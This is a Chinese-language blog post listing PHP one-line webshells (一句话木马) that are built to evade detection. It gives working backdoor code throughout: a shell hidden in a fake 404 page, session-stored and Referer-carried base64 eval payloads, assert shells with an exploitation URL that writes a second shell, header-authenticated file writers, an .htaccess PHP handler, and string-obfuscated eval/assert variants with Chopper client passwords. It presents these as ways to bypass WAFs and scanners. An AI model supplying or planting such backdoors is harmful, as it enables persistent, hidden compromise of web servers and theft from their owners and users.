强悍的PHP一句话后门 -更多请收藏本站 欢迎阅读

这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。

利用404页面隐藏PHP小马





01

02

03

04

05

06

07

08

09

10

11

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<html><head>

<title>404 Not Found</title>

</head><body>

<h1>Not Found</h1>

<p>The requested URL was not found on this server.</p>

</body></html>

<?php

@preg_replace("/[pageerror]/e",$_POST[‘error‘],"saft");

header(‘HTTP/1.1 404 Not Found‘);

?>

404页面是网站常用的文件,一般建议好后很少有人会去对它进行检查修改,这时我们可以利用这一点进行隐藏后门。

无特征隐藏PHP一句话





1

2

3

4

<?php

session_start();

$_POST[‘code‘] && $_SESSION[‘theCode‘] = trim($_POST[‘code‘]);

$_SESSION[‘theCode‘]&&preg_replace(‘\‘a\‘eis‘,‘e‘.‘v‘.‘a‘.‘l‘.‘(base64_decode($_SESSION[\‘theCode\‘]))‘,‘a‘);

将$_POST[‘code‘]的内容赋值给$_SESSION[‘theCode‘],然后执行$_SESSION[‘theCode‘],亮点是没有特征码。用扫描工具来检查代码的话,是不会报警的,达到目的了。

超级隐蔽的PHP后门





1

<?php $_GET[a]($_GET[b]);?>

仅用GET函数就构成了木马;

利用方法:





1

?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%    29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

执行后当前目录生成c.php一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马,真可谓不可小视,简简单单的一句话,被延伸到这般应用。

层级请求,编码运行PHP后门
此方法用两个文件实现,文件1





1

2

3

4

5

6

7

<?php

//1.php

header(‘Content-type:text/html;charset=utf-8‘);

parse_str($_SERVER[‘HTTP_REFERER‘], $a);

if(reset($a) == ‘10‘ && count($a) == 9) {

   eval(base64_decode(str_replace(" ""+", implode(array_slice($a, 6)))));

}

文件2





01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

<?php

//2.php

header(‘Content-type:text/html;charset=utf-8‘);

//要执行的代码

$code = <<<CODE

phpinfo();

CODE;

//进行base64编码

$code base64_encode($code);

//构造referer字符串

$referer "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";

//后门url

$url ‘http://localhost/test1/1.php‘;

$ch = curl_init();

$options array(

    CURLOPT_URL => $url,

    CURLOPT_HEADER => FALSE,

    CURLOPT_RETURNTRANSFER => TRUE,

    CURLOPT_REFERER => $referer

);

curl_setopt_array($ch$options);

echo curl_exec($ch);

通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码,来达到后门的效果,一般waf对referer这些检测要松一点,或者没有检测。用这个思路bypass
waf不错。

PHP后门生成工具weevely
weevely是一款针对PHP的webshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的
漏洞利用,隐藏后门或者使用类似telnet的方式来代替web
页面式的管理,weevely生成的服务器端php代码是经过了base64编码的,所以可以骗过主流的杀毒软件和IDS,上传服务器端代码后通常可以通
过weevely直接运行。

weevely所生成的PHP后门所使用的方法是现在比较主流的base64加密结合字符串变形技术,后门中所使用的函数均是常用的字符串处理函
数,被作为检查规则的eval,system等函数都不会直接出现在代码中,从而可以致使后门文件绕过后门查找工具的检查。使用暗组的Web后门查杀工具
进行扫描,结果显示该文件无任何威胁。

以上是大概介绍下边是截图,相关使用方法亦家就不在这介绍了,简单的科普一下。

三个变形的一句话PHP木马
第一个





1

<?php ($_[email protected]$_GET[2])[email protected]$_($_POST[1])?>

在菜刀里写http://site/1.php?2=assert密码是1

第二个





1

2

3

4

5

6

7

<?php

$_="";

$_[+""]=‘‘;

$_="$_"."";

$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");

?>

<?php ${‘_‘.$_}[‘_‘](${‘_‘.$_}[‘__‘]);?>

在菜刀里写http://site/2.php?_=assert&__=eval($_POST[‘pass‘])
密码是pass。
如果你用菜刀的附加数据的话更隐蔽,或者用其它注射工具也可以,因为是post提交的。

第三个






1

($b4dboy $_POST[‘b4dboy‘]) && @preg_replace(‘/ad/e‘,‘@‘.str_rot13(‘riny‘).‘($b4dboy)‘‘add‘);

str_rot13(‘riny’)即编码后的eval,完全避开了关键字,又不失效果,让人吐血!

.htaccess做PHP后门
这个其实在2007年的时候作者GaRY就爆出了,只是后边没人关注,这个利用关键点在于一句话:





1

2

AddType application/x-httpd-php .htaccess

###### SHELL ###### 这里写上你的后门吧###### LLEHS ######

toby57解析加密一句话木马
此段后门使用方法会与其它方法不太一样,具体看下面
Client:





1

2

3

4

<?php

if(crypt($_SERVER[‘HTTP_H0ST‘],51)==‘514zR17F8j0q6‘){@file_put_contents($_SERVER[‘HTTP_X‘],$_SERVER[‘HTTP_Y‘]);

header("Location: ./".$_SERVER[‘HTTP_X‘]);};

?>

Server:





01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

<?php

$fp fsockopen("127.0.0.1",80,$errno,$errstr,5);

if (!$fp){

echo(‘fp fail‘);

}

$out "GET /php_muma/client.php HTTP/1.1\r\n";

$out .= "Content-Type: application/x-www-form-urlencoded\r\n";

$out .= "User-Agent: MSIE\r\n";

$out .= "Host: 127.0.0.1\r\n";

$out .= "H0ST: qiushui51a\r\n";

$out .= "X: ../shell.php \r\n";

$out .= "Y: <?php eval(\$_POST1);?>\r\n";

$out .= "Connection: close\r\n\r\n";

fwrite($fp,$out);

while(!feof($fp)){

$resp_str="";

$resp_str .= fgets($fp,512);//返回值放入$resp_str

}

fclose($fp);

echo($resp_str);//处理返回值.

?>

对服务端与客户端指令对比,如一致则执行后门指令。

几个President分享的PHP一句话





01

02

03

04

05

06

07

08

09

10

11

12

13

14

<?php $a str_replace(x,"","axsxxsxexrxxt");$a($_POST["sz"]); ?>

<?php $lang = (string)key($_POST);$lang($_POST[‘sz‘]); ?>

<?php $k="ass"."ert"$k(${"_PO"."ST"} [‘sz‘]);?>

<?php $a "a"."s"."s"."e"."r"."t";  $a($_POST["sz"]); ?>

<?php

@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";

@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";

@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}

[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>

//上面这个密码-7

最后列几个高级的PHP一句话木马后门





01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

1、

$hh "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";

$hh("/[discuz]/e",$_POST[‘h‘],"Access");

//菜刀一句话

2、

$filename=$_GET[‘xbid‘];

include ($filename);

//危险的include函数,直接编译任何文件为php格式运行

3、

$reg="c"."o"."p"."y";

$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);

//重命名任何文件

4、

$gzid "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";

$gzid("/[discuz]/e",$_POST[‘h‘],"Access");

//菜刀一句话

5、include ($uid);

//危险的include函数,直接编译任何文件为php格式运行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif

//gif插一句话

6、典型一句话

程序后门代码

<?php eval_r($_POST[sb])?>

程序代码

<?php @eval_r($_POST[sb])?>

//容错代码

程序代码

<?php assert($_POST[sb]);?>

//使用lanker一句话客户端的专家模式执行相关的php语句

程序代码

<?$_POST[‘sa‘]($_POST[‘sb‘]);?>

程序代码

<?$_POST[‘sa‘]($_POST[‘sb‘],$_POST[‘sc‘])?>

程序代码

<?php

@preg_replace("/[email]/e",$_POST[‘h‘],"error");

?>

//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入

程序代码

<O>[email protected]_r($_POST1);</O>

程序代码

<script language="php">@eval_r($_POST[sb])</script>

//绕过<?限制的一句话

时间: 2024-10-26 14:12:07

强悍的PHP一句话后门 -更多请收藏本站 欢迎阅读的相关文章

那些强悍的PHP一句话后门

强悍的PHP一句话后门 常用一: <?php $a=range(1,200);$b=chr($a[96-1+1]).chr($a[114-1+1]).chr($a[114-1+1]).chr($a[100-1+1]).chr($a[113-1+1]).chr($a[115-1+1]); $b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]); ?> 所以连起来就是 assert(${_POS

强大的PHP一句话后门

强悍的PHP一句话后门  这类后门让网站.服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的. 今天我们细数一些有意思的PHP一句话木马. 1.利用404页面隐藏PHP小马:  1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> 2 <html><head> 3 <title>404 Not Found</title>

一个一句话后门代码详解

神秘的一句话后门代码内容: <?php    @$_++;  $__=("#"^"|");$__.=("."^"~");$__.=("/"^"`");$__.=("|"^"/");$__.=("{"^"/");  ${$__}[!$_](${$__}[$_]); ?> 代码作用: 以上代码即是PH

一个神秘的PHP一句话后门代码详解

神秘的一句话后门代码内容: <?php    @$_++;  $__=("#"^"|");$__.=("."^"~");$__.=("/"^"`");$__.=("|"^"/");$__.=("{"^"/");  ${$__}[!$_](${$__}[$_]); ?> 代码作用: 以上代码即是PH

一个神秘的一句话后门代码详解

神秘的一句话后门代码内容: <?php    @$_++;  $__=("#"^"|");$__.=("."^"~");$__.=("/"^"`");$__.=("|"^"/");$__.=("{"^"/");  ${$__}[!$_](${$__}[$_]); ?> 代码作用: 以上代码即是PH

设为首页收藏本站js代码(引自ecshop模板堂(ecmoban.com)

http://help.ecmoban.com/article-1596.html 设为首页 和 收藏本站js代码 兼容IE,chrome,ff,360等 将以下代码放到首页 或者新建js文件 <script type="text/javascript"> //设为首页 www.ecmoban.com function SetHome(obj,url){ try{ obj.style.behavior='url(#default#homepage)'; obj.setHom

兼容所有浏览器的设为首页收藏本站js代码

大家发现传统的收藏本站按钮在360浏览器下面没有效果了,但是360浏览器用户群却非常之大.所以我们在网上找到一个兼容所有浏览器的收藏本站解决方案,具体功能如下: 设为首页 和 收藏本站js代码 兼容IE,chrome,ff,360等 将以下代码放入页面或者新建js文件 <script type="text/javascript"> //设为首页 function SetHome(obj,url){ try{ obj.style.behavior='url(#default#

asp.net链接数据库问题,设置收藏本站,设置主页

SQL Server 2008附加数据库失败:无法打开物理文件拒绝访问解决方法 无法打开物理文件 "E:\SQLDATA\EMSXDB.mdf".操作系统错误 5:"5(拒绝访问.)". (Microsoft SQL Server,错误: 5120) 这是由于权限问题导致的,解决方法有两种:一是将mdf和ldf文件移动到数据库数据目录(例如D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSS

php一句话后门过狗姿势万千之传输层加工【三】

既然木马已就绪,那么想要利用木马,必然有一个数据传输的过程,数据提交是必须的,数据返回一般也会有的,除非执行特殊命令. 当我们用普通菜刀连接后门时,数据时如何提交的,狗狗又是如何识别的,下面结合一个实例,用通俗易懂的方式来演示数据提交层直接过狗原理. 本文意义:纵使网上有很多修改菜刀过狗的方法,但是我都看了下,局限性比较大,而且不太系统,新人学了可能会只是其一不知其二 环境: 域名与服务器均为个人真实所有. 服务器开启网站安全狗+服务器安全狗,引擎全部开启,最高防护级别. 对比环境: 服务器:a